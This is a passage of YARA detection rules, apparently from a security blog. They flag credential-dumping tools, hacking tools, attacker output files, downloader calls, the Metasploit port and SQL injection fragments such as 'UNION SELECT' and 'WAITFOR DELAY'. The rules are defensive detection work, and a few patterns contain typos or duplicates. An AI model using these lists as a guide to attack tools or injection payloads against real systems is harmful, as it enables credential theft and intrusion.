$string0 = "password.txt" nocase
$string1 = "pwd.txt" nocase
$string2 = "passwd.txt" nocase
$string3 = "password.doc" nocase
$string4 = "pwd.doc" nocase
$string5 = "passwd.doc" nocase
$string6 = "password.xls" nocase
$string7 = "pwd.xls" nocase
$string8 = "passwd.xls" nocase
$string9 = "passwords.txt" nocase
$string10 = "pwds.txt" nocase
$string11 = "passwds.txt" nocase
$string12 = "passwords.doc" nocase
$string13 = "pwds.doc" nocase
$string14 = "passwds.doc" nocase
$string15 = "passwords.xls" nocase
$string16 = "pwds.xls" nocase
$string17 = "passwds.xls" nocase
$string18 = "web.config" nocase
$string19 = "application.config" nocase
condition:
1 of them
}
rule AdminUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Admin Web Pages"
strings:
$string0 = "/admin/" nocase
$string1 = "/wp-admin/" nocase
condition:
1 of them
}
rule HackingToolFound
{
meta:
author = "@neonprimetime"
description = "Hacking Tool Found"
strings:
$string0 = "kali.exe" nocase
$string2 = "wireshark" nocase
$string3 = "bloodhound" nocase
$string4 = "obfuscation" nocase
$string5 = "shellcode" nocase
$string6 = "keylogger" nocase
$string7 = "bypassuac" nocase
$string8 = "tokenmanipulation" nocase
$string10 = "passhash" nocase
$string11 = "kerberoast" nocase
$string12 = "ninja" nocase
$string13 = "memorynps" nocase
$string14 = "metasploit" nocase
$string15 = "smbexec" nocase
$string16 = "gpppassword" nocase
$string17 = "arpscan" nocase
$string18 = "dnscat" nocase
$string19 = "aircrack" nocase
$string20 = "bulletspassview" nocase
$string21 = "chromepass" nocase
$string22 = "credentialsfileview" nocase
$string23 = "echo.exe" nocase
$string24 = "hydra.exe" nocase
$string25 = "iepv.exe" nocase
$string26 = "inssidersetup" nocase
$string28 = "mailpv.exe" nocase
$string29 = "ministumblersetup" nocase
$string33 = "netpass.exe" nocase
$string34 = "netstumbler" nocase
$string35 = "nltest.exe" nocase
$string36 = "ophcrack" nocase
$string37 = "rdpv.exe" nocase
$string38 = "setspn" nocase
$string39 = "sniffpass" nocase
$string40 = "vaultpasswordview" nocase
$string41 = "\\ver.exe" nocase
$string42 = "vncpassview" nocase
$string43 = "webbrowserpassview" nocase
condition:
1 of them
}
rule HackingCodeFound
{
meta:
author = "@neonprimetime"
description = "Hacking Code Found"
strings:
$string0 = "WriteProcessMemory" nocase
$string1 = "VirtualAlloc" nocase
$string2 = "SetWindowsHook" nocase
$string3 = "SHCreateThread" nocase
$string4 = "FromBase64String" nocase
$string5 = "PromptForCredential" nocase
$string6 = "AdjustTokenPrivileges" nocase
$string7 = "KerberosRequestorSecurityToken" nocase
$string8 = "UnsafeNativeMethods" nocase
$string9 = "ReadProcessMemoryMiniDumpWriteDump" nocase
$string10 = "TOKEN_ADJUST_PRIVILEGES" nocase
$string11 = "TOKEN_IMPERSONATE" nocase
$string12 = "TOKEN_ELEVATION" nocase
$string13 = "TOKEN_ALL_ACCESS" nocase
condition:
1 of them
}
rule PasswordDumpAttempt
{
meta:
author = "@neonprimetime"
description = "Password Dump Temp"
strings:
$string0 = "mimikatz" nocase
$string1 = "procdump" nocase
$string3 = "hashdump" nocase
$string4 = "pwdump" nocase
$string5 = "lsadump" nocase
condition:
1 of them
}
rule ExternalDriveAccessed
{
meta:
author = "@neonprimetime"
description = "External Drive Accessed"
strings:
$string4 = "file:///f:/" nocase
$string6 = "file:///g:/" nocase
$string8 = "mfeprom" nocase
condition:
1 of them
}
rule HackerOutputFile
{
meta:
author = "@neonprimetime"
description = "Hacker Output Files"
strings:
$string0 = "acls.csv" nocase
$string1 = "bloodhound.csv" nocase
$string2 = "dump.csv" nocase
$string3 = "dump.xml" nocase
$string4 = "dump.zip" nocase
$string5 = "firewall.txt" nocase
$string6 = "group_memberships.csv" nocase
$string7 = "hashdump.txt" nocase
$string8 = "local_admins.csv" nocase
$string9 = "lsadump.txt" nocase
$string10 = "lsass.dmp" nocase
$string11 = "lsassdump.dmp" nocase
$string12 = "mimikatz.xls" nocase
$string13 = "mini.dmp" nocase
$string14 = "netscan.xml" nocase
$string15 = "nmap.csv" nocase
$string16 = "nmap.txt" nocase
$string17 = "nmap.xml" nocase
$string18 = "openvas.csv" nocase
$string19 = "pwdump.txt" nocase
$string20 = "secretsdump.txt" nocase
$string21 = "targets.txt" nocase
$string22 = "trusts.csv" nocase
$string23 = "user_sessions.csv" nocase
$string24 = "bloodhound.bin" nocase
$string25 = ".gnmap" nocase
$string26 = ".nessus" nocase
$string27 = ".nmap" nocase
$string28 = "p0wn" nocase
condition:
1 of them
}
rule HackerUrl
{
meta:
author = "@neonprimetime"
description = "Hacker Url"
strings:
$string1 = "kali." nocase
$string2 = "/kali/" nocase
$string3 = "kali-" nocase
$string4 = "backbox." nocase
$string5 = "/backbox/" nocase
$string6 = "backbox-" nocase
$string7 = "blackarch." nocase
$string8 = "/blackarch/" nocase
$string9 = "blackarch-" nocase
$string10 = "caine-live." nocase
$string11 = "/caine-live/" nocase
$string12 = "caine-live-" nocase
$string13 = "deftlinux." nocase
$string14 = "/deftlinux/" nocase
$string15 = "deftlinux-" nocase
$string16 = "parrotsec." nocase
$string17 = "/parrotsec/" nocase
$string18 = "parrotsec-" nocase
$string19 = "altlinux./altlinux/" nocase
$string20 = "altlinux-" nocase
$string21 = "digi77." nocase
$string22 = "/digi77/" nocase
$string23 = "digi77-" nocase
$string24 = ".paterva." nocase
$string25 = "portswigger." nocase
$string26 = "exploit-db." nocase
$string27 = "/exploit-db/" nocase
$string28 = "exploit-db-" nocase
$string29 = "parrot.sh" nocase
$string30 = "/parrot.sh/" nocase
$string31 = "basealt.ru" nocase
$string32 = "/basealt.ru/" nocase
$string33 = "basealt.ru-" nocase
$string34 = "0day.today" nocase
$string35 = "/0day.today/" nocase
$string36 = "0day.today-archstrike." nocase
$string37 = "/archstrike/" nocase
$string38 = "archstrike-" nocase
condition:
1 of them
}
rule PUPSoftware
{
meta:
author = "@neonprimetime"
description = "Potentially Unwanted Software"
strings:
$string0 = "adusetup" nocase
$string1 = "advanced driver" nocase
$string2 = "anytimeastrology" nocase
$string3 = "aplusgamer" nocase
$string4 = "apnsetup" nocase
$string5 = "apnstub" nocase
$string6 = "ascsetup" nocase
$string7 = "astromenda" nocase
$string8 = "atozmanuals" nocase
$string9 = "atwrun" nocase
$string10 = "audiotoaudio" nocase
$string11 = "bringmesports" nocase
$string12 = "bytefence" nocase
$string13 = "calendarspark" nocase
$string14 = "ccleaner" nocase
$string15 = "citysearch" nocase
$string16 = "convertpdfsnowtooltab" nocase
$string17 = "coupon companion" nocase
$string18 = "couponscom" nocase
$string19 = "cursormania" nocase
$string20 = "dailybibleguide" nocase
$string21 = "dailyrecipeguidetooltab" nocase
$string22 = "dailywellnessguide" nocase
$string23 = "dictionaryboss" nocase
$string24 = "directionsandmap" nocase
$string25 = "discoverancestry" nocase
$string26 = "discoverliveradio" nocase
$string27 = "disk-defrag-setup" nocase
$string28 = "downspeedtest" nocase
$string29 = "driver-updater-setup" nocase
$string30 = "driver.talent" nocase
$string31 = "driverassist-setup" nocase
$string32 = "driverdoc" nocase
$string33 = "drivereasy" nocase
$string34 = "driverrestore" nocase
$string35 = "driversupport" nocase
$string36 = "drivertalent" nocase
$string37 = "drivertoolkit" nocase
$string38 = "driverupdate-" nocase
$string39 = "driverupdate-downloader" nocase
$string40 = "driverupdate-setup" nocase
$string41 = "driverwhiz" nocase
$string42 = "easeware" nocase
$string43 = "easydriverpro" nocase
$string44 = "easyhomedecorating" nocase
$string45 = "easypdfcombine" nocase
$string46 = "easyphotoedit" nocase
$string47 = "eliteunzip" nocase
$string48 = "emailaccessonline" nocase
$string49 = "everyday lookup" nocase
$string50 = "everydaylookup" nocase
$string51 = "filefanatic" nocase
$string52 = "filesharefanatic" nocase
$string53 = "flashplayerpro" nocase
$string54 = "flightsearchapp" nocase
$string55 = "freemakevideoconvertersetup" nocase
$string56 = "freemanuals" nocase
$string57 = "freeradiocast" nocase
$string58 = "fromdoctopdftooltab" nocase
$string59 = "funcustomcreations" nocase
$string60 = "gamingassassin" nocase
$string61 = "gamingwonderland" nocase
$string62 = "garden enthusiast" nocase
$string63 = "gardeningenthusiast" nocase
$string64 = "getflightinfo" nocase
$string65 = "getformsonline" nocase
$string66 = "gettvstreamnow" nocase
$string67 = "gifables" nocase
$string68 = "happinessinfusion" nocase
$string69 = "headlinealley" nocase
$string70 = "howtosimplified" nocase
$string71 = "howtosuite" nocase
$string72 = "inboxace" nocase
$string73 = "internetspeedtracker" nocase
$string74 = "knowthebible" nocase
$string75 = "localcrimewatcher" nocase
$string76 = "mapsgalaxy" nocase
$string77 = "marineaquariumlite" nocase
$string78 = "mergedocsonline" nocase
$string79 = "mydailyrunway" nocase
$string80 = "myeasylotto" nocase
$string81 = "myformsfinder" nocase
$string82 = "myfuncards" nocase
$string83 = "mynewsguide" nocase
$string84 = "mypcbackup" nocase
$string85 = "myradioplayer" nocase
$string86 = "myscrapnook" nocase
$string87 = "mysocialshortcut" nocase
$string88 = "mytelevisionhq" nocase
$string89 = "mytransitguide" nocase
$string90 = "myweatherradar" nocase
$string91 = "mywebface" nocase
$string92 = "notehomepage" nocase
$string93 = "onlinemapfinder" nocase
$string94 = "openfreely" nocase
$string95 = "packagetracer" nocase
$string96 = "pckeeper" nocase
$string97 = "pdfconverterhq" nocase
$string98 = "photofriendzy" nocase
$string99 = "playpoptrivia" nocase
$string100 = "playthruplayer" nocase
$string101 = "popularscreensavers" nocase
$string102 = "ppc-software" nocase
$string103 = "premierdownloadmanager" nocase
$string104 = "procleaningsoftware" nocase
$string105 = "productivityboss" nocase
$string106 = "productmanualsfinder" nocase
$string107 = "propccleaner" nocase
$string108 = "puzzlegamesdaily" nocase
$string109 = "quotationcafe" nocase
$string110 = "qyuninst" nocase
$string111 = "radiorage" nocase
$string112 = "readingfanatic" nocase
$string113 = "registry-cleaner" nocase
$string114 = "regservo" nocase
$string115 = "removedt" nocase
$string116 = "safepcrepair" nocase
$string117 = "scenichomepage" nocase
$string118 = "searchbar" nocase
$string119 = "searchformsonline" nocase
$string120 = "searchpredict" nocase
$string121 = "slimcleanerplus" nocase
$string122 = "smsfrombrowser" nocase
$string123 = "snapmyscreen" nocase
$string124 = "soccerinferno" nocase
$string125 = "spyhunter" nocase
$string126 = "studyhq" nocase
$string127 = "sweepstakesalley" nocase
$string128 = "tbieaddin.dll" nocase
$string129 = "televisionfanatic" nocase
$string130 = "ticketxplorer" nocase
$string131 = "timewhackers" nocase
$string132 = "tooltabextension.dll" nocase
$string133 = "totalrecipesearch" nocase
$string134 = "trackapackage" nocase
$string135 = "translationbuddy" nocase
$string136 = "unifiedlogger.dll" nocase
$string137 = "utility chest" nocase
$string138 = "videodownloadconverter" nocase
$string139 = "votinstw" nocase
$string140 = "votprx" nocase
$string141 = "wb-setup" nocase
$string142 = "web_bar" nocase
$string143 = "webdiscover" nocase
$string144 = "webdiscoverbrowserdownloaderwebesc" nocase
$string145 = "webext_dl" nocase
$string146 = "winwb" nocase
$string147 = "yourtemplatefindertooltab" nocase
$string148 = "ysearchsettool" nocase
$string149 = "ysearchutilsvc" nocase
condition:
1 of them
}
rule ActiveDirectoryDomainFlag
{
meta:
author = "@neonprimetime"
description = "AD domain flag"
strings:
$string0 = " /domain " nocase
condition:
1 of them
}
rule ActiveDirectoryCreateFlag
{
meta:
author = "@neonprimetime"
description = "AD Create flag"
strings:
$string0 = " /add " nocase
$string1 = " /create " nocase
condition:
1 of them
}
rule MetasploitPort
{
meta:
author = "@neonprimetime"
description = "Metasploit Port"
strings:
$string0 = ":4444" nocase
condition:
1 of them
}
rule AdminFileShareAccess
{
meta:
author = "@neonprimetime"
description = "Admin File Share Access"
strings:
$string0 = "admin$" nocase
condition:
1 of them
}
rule TeamViewerPort
{
meta:
author = "@neonprimetime"
description = "TeamViewer Port"
strings:
$string0 = ":5938" nocase
condition:
1 of them
}
rule ActiveDirectoryCriticalGroup
{
meta:
author = "@neonprimetime"
description = "Critical AD groups"
strings:
$string0 = "domain admins" nocase
$string1 = "enterprise admins" nocase
$string2 = "schema admins" nocase
$string3 = "workstation admins" nocase
$string4 = "dns admins" nocase
$string5 = "server admins" nocase
condition:
1 of them
}
rule NewUser
{
meta:
author = "@neonprimetime"
description = "New User Commands"
strings:
$string0 = "new-localuser" nocase
$string1 = "new-aduser" nocase
condition:
1 of them
}
rule WebDownloader
{
meta:
author = "@neonprimetime"
description = "Web Downloader"
strings:
$string0 = "DownloadFile(" nocase
$string1 = "DownloadString" nocase
$string2 = "WebRequest" nocase
$string3 = "wget" nocase
$string4 = "bitstransfer" nocase
condition:
1 of them
}
rule McAfeeQuarantineFile
{
meta:
author = "@neonprimetime"
description = "McAfee Quarantine File"
strings:
$string0 = "\\quarantine\\" nocase
$string1 = ".bup" nocase
condition:
1 of them
}
rule VulnerabilityScanner
{
meta:
author = "@neonprimetime"
description = "Vulnerability Scanner"
strings:
$string0 = "AngryIP" nocase
$string1a = "\\Nmap " nocase
$string1b = "/Nmap." nocase
$string1c = " Nmap " nocase
$string1d = " Nmap." nocase
$string2 = "Nessus" nocase
$string3 = "sqlmap" nocase
$string4 = "nikto" nocase
$string5 = "wpscan" nocase
$string6 = "hyrda" nocase
$string7 = "dirbuster" nocase
$string8 = "masscan" nocase
$string9 = "morfeus" nocase
$string10 = "sqlninja" nocase
condition:
1 of them
}
rule SqlInjection
{
meta:
author = "@neonprimetime"
description = "Sql Injection"
strings:
$string0 = "UNION+ALL+SELECT" nocase
$string1 = ",NULL,NULL" nocase
$string2 = "AND+SLEEP" nocase
$string3 = "PG_SLEEP" nocase
$string4 = "WAITFOR+DELAY" nocase
$string5 = "CONCAT(0x" nocase
$string6 = "UNION+SELECT" nocase
$string7 = "--+" nocase
$string8 = "')UNION ALL SELECT" nocase
$string9 = ",NULL,NULL" nocase
$string10 = "AND SLEEP" nocase
$string11 = "WAITFOR DELAY" nocase
$string12 = "CONTACT(0x" nocase
$string13 = "UNION SELECT" nocase
$string14 = "UNION+ALL+SELECT" nocase
$string15 = "AND+SLEEP" nocase
$string16 = "WAITFOR+DELAY" nocase
$string17 = "UNION+SELECT)" nocase
condition:
1 of them
}
Subscribe to:
Posts (Atom)